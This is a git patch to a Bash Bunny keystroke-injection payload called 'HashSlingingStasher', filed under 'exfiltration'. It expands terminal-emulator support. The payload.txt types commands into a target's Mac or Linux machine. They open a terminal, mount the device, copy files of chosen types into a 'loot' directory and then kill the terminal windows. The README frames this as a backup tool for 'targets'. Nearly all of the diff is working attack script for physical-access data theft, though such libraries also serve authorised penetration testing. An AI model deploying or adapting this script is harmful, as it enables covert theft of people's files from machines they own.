From 1740699edcb38e9741890e2b3d44dc4a074a2182 Mon Sep 17 00:00:00 2001 From: pRs3k <55955671+pRs3k@users.noreply.github.com> Date: Fri, 27 Oct 2023 20:19:00 -0600 Subject: [PATCH] Added additional terminal emulator and OS support --- .../HashSlingingStasher/README.md | 4 +- .../HashSlingingStasher/payload.txt | 66 +++++++++++++++++-- 2 files changed, 62 insertions(+), 8 deletions(-) diff --git a/payloads/library/exfiltration/HashSlingingStasher/README.md b/payloads/library/exfiltration/HashSlingingStasher/README.md index a822f144..5138fffb 100755 --- a/payloads/library/exfiltration/HashSlingingStasher/README.md +++ b/payloads/library/exfiltration/HashSlingingStasher/README.md @@ -42,7 +42,7 @@ NNNNNNNNNNNXXNNNNXK0OOOOO00KXXNNNNNNXXKKKKKKXXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN -HSS is a data backup tool for MacOS and Linux targets (tested on Ubuntu 22.04.3 LTS, MacOS 13.6, and Kali Linux 2023.3) (not compatible with Windows). It is designed to find and copy user defined file types/sizes to the udisk on the Bash Bunny, and keep track of them using checksums. This allows the user to scan, stop, and revisit the target to resume copying only new files, skipping those previously copied. +HSS is a data backup tool for MacOS and Linux targets (tested on MacOS 13.x/14.0, Ubuntu 22.04.3 LTS, Manjaro 23.0.4, and Kali Linux 2023.3) (not compatible with Windows). It is designed to find and copy user defined file types/sizes to the udisk on the Bash Bunny, and keep track of them using checksums. This allows the user to scan, stop, and revisit the target to resume copying only new files, skipping those previously copied. # Instructions @@ -80,6 +80,6 @@ FINISH... Green 1000ms VERY FAST blink followed by SOLID Manually run this script in the parent directory above a directory called "backup" containing files you want to add to a checksums.txt list. Then take the checksums.txt file and place it in .../loot/hss/ to prevent the files from being copied to the .../loot/hss/backups/ directory the next time HSS is run. # hss_cleanup.sh -### To perform cleanup functions on the loot directory +### To manually perform cleanup functions on the loot directory Manually run this script inside the .../loot/hss/ directory to unhide hidden files, and sort files into directories based on their file extension inside the loot directory. diff --git a/payloads/library/exfiltration/HashSlingingStasher/payload.txt b/payloads/library/exfiltration/HashSlingingStasher/payload.txt index bc2916c4..59e40092 100755 --- a/payloads/library/exfiltration/HashSlingingStasher/payload.txt +++ b/payloads/library/exfiltration/HashSlingingStasher/payload.txt @@ -1,9 +1,9 @@ # Title: Hash Slinging Stasher for Bash Bunny # Description: Copies files to Bash Bunny udisk from the target OS matching given extensions and file size only if their checksum does not appear in a user defined or generated checksum list, and appends the checksum of copied files to that list. # Author: theSW4n -# Version: 1.0 +# Version: 1.1 # Category: Exfiltration -# Target: Tested on Ubuntu 22.04.3 LTS, MacOS 13.x, and Kali Linux 2023.3 (not compatible with Windows) +# Target: Tested on MacOS 13.x/14.0, Ubuntu 22.04.3 LTS, Manjaro 23.0.4, and Kali Linux 2023.3 (not compatible with Windows) # Attackmodes: HID, Storage # Options @@ -32,12 +32,66 @@ QUACK GUI QUACK STRING "terminal" QUACK ENTER QUACK DELAY 1500 -QUACK STRING "xterm" +QUACK STRING "qterminal" QUACK ENTER -QUACK DELAY 1500 +QUACK DELAY 500 QUACK STRING "n" QUACK ENTER -QUACK DELAY 1500 +QUACK DELAY 500 +QUACK STRING "gnome-terminal" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "xterm" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "konsole" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "lxterminal" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "urxvt" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "st" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "alacritty" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "xfce4-terminal" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "tilda" +QUACK ENTER +QUACK DELAY 500 +QUACK STRING "n" +QUACK ENTER +QUACK DELAY 500 QUACK STRING "udisksctl mount -b /dev/disk/by-label/`ls /dev/disk/by-label/ | grep -i BashBunny`" QUACK ENTER QUACK DELAY 1500 @@ -79,7 +133,7 @@ QUACK DELAY 1500 QUACK STRING "diskutil eject \$(mount | grep -i BashBunny | cut -d ' ' -f 3)" QUACK ENTER QUACK DELAY 2000 -QUACK STRING "killall qterminal & killall Terminal & killall gnome-terminal- & killall konsole & killall xterm" +QUACK STRING "killall qterminal & killall gnome-terminal- & killall Terminal & killall xterm & killall konsole & killall lxterminal & killall urxvt & killall st & killall alacritty & killall xfce4-terminal & killall tilda" QUACK ENTER sync